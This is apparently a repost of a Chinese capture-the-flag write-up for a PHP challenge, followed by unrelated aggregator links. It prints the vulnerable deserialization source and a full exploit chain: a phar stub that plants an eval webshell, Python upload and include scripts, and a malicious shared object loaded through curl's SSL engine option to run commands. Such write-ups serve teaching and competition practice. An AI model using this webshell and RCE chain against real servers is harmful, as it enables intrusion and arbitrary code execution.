法尔plus wp

news/2025/12/9 10:25:51/文章来源:https://www.cnblogs.com/t0mcater/p/19325098

考点是phar rce + 最新版绕过open_basedir的方法

<?php
highlight_file(__FILE__);function waf($data){if (is_array($data)){die("nonono arrays");}if (preg_match('/<\?|__HALT_COMPILER|get|Coral|Nimbus|Zephyr|Acheron|ctor|payload|php|filter|base64|rot13|read|data/i', $data)) {die("You can't do");}
}class ddd{public $pivot;public function __set($k, $value) {$k = $this->pivot->ctor;echo new $k($value);}
}class ccc{public $handle;public $ctor;public function __destruct() {return $this->handle();}public function __call($name, $arg){$arg[1] = $this->handle->$name;}
}class bbb{public $target;public $payload;public function __get($prop){$this->target->$prop = $this->payload;}
}class aaa {public $mode;public function __destruct(){$data = $_POST[0];if ($this->mode == 'w') {waf($data);echo $data;$filename = "/var/www/html/".md5(rand()).".phar";file_put_contents($filename, $data);echo $filename;} else if ($this->mode == 'r') {waf($data);$f = include($data);if($f){echo "yesyesyes";}else{echo "You can look at the others";}}}
}if(strlen($_POST[1]) < 52) {$a = unserialize($_POST[1]);
}
else{echo "too long!!";
}?>

include邂逅phar
看这篇文章讲了底层逻辑
当include邂逅phar——DeadsecCTF2025 baby-web – fushulingのblog
最后的结论就是，比如我们生成了一个phar文件，然后把他打包成gz文件，当我们include这个gz文件时，php会默认把这个gz文件解压回phar进行解析
那么我们只要包含关键字就能直接rce
可是这里我把open_basedir还有一些system的指令全都ban掉了基本上是不可能命令执行成功的考点就算最新版本的绕过方法之前有些我们这里写个马进去

<?php class TEST{ } $a=new TEST(); @unlink("shell.phar"); $phar = new Phar("shell.phar"); $phar->startBuffering(); $phar->setMetadata($a); $stub="<?php \$content = '<?php @eval(\$_POST[\"cmd\"]); ?>'; file_put_contents('/var/www/html/4.php', \$content);__HALT_COMPILER(); ?>"; $phar -> setStub($stub); $phar->addFromString("1.txt", "6666"); $phar->stopBuffering(); ?>

然后gz压缩

gzip -c shell.phar > shell.phar.gz

接下来就算传文件上去这里用python

import requests
url='http://172.18.131.0:8888/1.php'
with open('shell.phar2.gz','rb') as file:f=file.read()
data={"0":f,"1":"O:3:\"aaa\":1:{s:4:\"mode\";s:1:\"w\";}"}
response=requests.post(url=url,data=data)
print(response.text)

再去做包含

import requests
url='http://172.18.131.0:8888/1.php'
bbb='/var/www/html/a388df223ff2ac5e539a896f5dc0be79.phar'
data={"0":bbb,"1":"O:3:\"aaa\":1:{s:4:\"mode\";s:1:\"r\";}"}
response=requests.post(url=url,data=data)
print(response.text)

成功写入木马
怕他家觉得自己的马传上去没用，我还贴心的给了phpinfo
发现禁用sqlite3那么就用curl
所以我们需要编写一个恶意的 so 文件：

#include <stdlib.h>__attribute__((constructor))
static void rce_init(void){system("env >/tmp/pro");
}

编译成 so ：

g++ -fPIC -shared -o evil.so 1.cpp

然后通过加载 so 来rce:

$ch = curl_init();
curl_setopt($ch, CURLOPT_SSLENGINE,"/tmp/evil.so");
$data = curl_exec($ch);

最后一点感想，很荣幸刚加入V&N就能参与这一次出题，收获了很多，题目不是很难，师傅们应该也打得很尽心，希望能和V&N一起进步

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/994371.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

法尔plus wp

相关文章

2025郑州拿证快/可换教练驾校排名：附近靠谱驾校推荐与全解

2025年度净化板服务商TOP5权威推荐，甄选企业助力洁净工

2025折弯机无压痕模选购参考榜

.NET 8以上版本，字节数组转字符串

2025 家装衣柜选购指南：6 大品牌推荐，环保收纳与美学兼具

2025年市面上优秀的微动开关公司口碑推荐榜，新能源微动开关/大电流微动开关/防水微动开关/微动开关/汽车微动开关定做厂家哪家权威

2025年瑞士马格MAAG齿轮泵NP28/28代理商权威推荐榜单：MAAG齿轮泵NP45/45‌/MAAG齿轮泵‌/瑞士马格MAAG齿轮泵‌‌源头代理商精选

涿鹿县自建房找谁好？河北张家口涿鹿县自建房公司 / 机构深度评测口碑推荐榜

2026年北京市门头沟区农村自建房推荐榜，图南建房宝领衔六家家实力公司赋能乡村宜居生活。

2026年北京市门头沟区农村自建房推荐榜，图南建房宝领衔六家家实力公司赋能乡村宜居生活。

数据安全交换平台有哪些？一文读懂主流类型优劣势

2025 年 12 月高空特种作业服务商权威推荐榜：幕墙吊装/拆卸，塔吊高空拆卸/解体/事故救援，安全高效解决方案深度解析

2025 年 12 月高空特种作业服务商权威推荐榜：幕墙吊装/拆卸，塔吊高空拆卸/解体/事故救援，安全高效解决方案深度解析

在河北省邢台市襄都区老家农村盖房子，靠谱的自建房公司口碑推荐。河北省邢台市襄都区自建房公司/机构权威测评推荐排行榜

2025年12月螺丝厂家推荐：紧固件行业头部企业对比评价报告

2025年机械/空调/航空用温度传感器五大推荐公司，工业测温

2025年12月助听器标杆品牌最新推荐：爱可声助听器，国产助听器、专业助听器、助听器品牌、老年人助听器、助听器验配、隐形助听器、为清晰聆听设立个性化新标准

2025年12月广东紧固件厂家推荐：核心厂商对比评测与选型建议

2025年宁波口碑不错的食堂承包公司推荐，诚信的工厂食堂承包

2025年宁波口碑不错的食堂承包公司推荐，诚信的工厂食堂承包